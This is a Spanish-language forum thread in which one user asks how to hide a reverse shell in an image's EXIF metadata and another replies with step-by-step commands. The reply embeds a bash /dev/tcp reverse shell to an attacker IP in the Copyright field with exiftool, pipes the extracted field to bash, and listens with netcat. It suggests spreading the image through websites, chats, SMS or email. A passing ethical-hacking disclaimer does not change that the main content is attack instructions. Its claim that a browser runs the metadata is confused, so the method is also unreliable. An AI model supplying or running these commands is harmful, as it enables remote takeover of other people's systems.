Saludos a tod@s,llevo un tiempito tratando buscando como injectar una reverse shell dentro de una image. Todos los videos/material me muestran solo un poco del metodo y quisiera injectar una reverse shell en el "comment" usando Exif.
Alguien puede compartirme una reverse shell pequena en tamano?
Los leo y feliz 2025
Hola n0z, te comento, para instalar un Reverse Shell en una imagen, debes tener lista ya la imagen en un formato conocido, como jpg, png, etc...
Modifica la imagen con "EXIFTOOL" añadiendo la shell como metadata a la imagen, esto sd hace con el comando "* exiftool -Copyright=" ;bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" imagen.jpg *" asegurate de cambiar 10.0.0.1 y 4444 por la IP y el Puerto del Servidor Atacante...
Carga la imagen en el modus operandi que deseas usar, cargar la imagen en un sitio web, en un chat, en un SMS, en un Email o sistema donde quieras ejecutar ela reverse Shell...
Lyego de haber hecho eso, lo siguiente sera, en el Navegador ejecuta la metadata añadida a la imagen, esto se hace mediante el comando: "* exiftool -b -Copyright imagen.jpg | bash *" una vez que ejecutas este comando, deberias poder Escuchar la Conexion en tu maquina Atacante, te recomiendo utilizar "NETCAT" para escuchar la conexion entrante con la linea de comando "* nc -lvnp 4444 *" de esta forma puedes ejecutar un reverse shell a base de una imagen modificada, estas tecnicas normalmente se usan en pruebas de penetracion eticas y fines de seguridad ciberneticas, espero que mi aporte te sea de ayuda bro! FELIZ 2025 PARA TI TAMBIEN!!!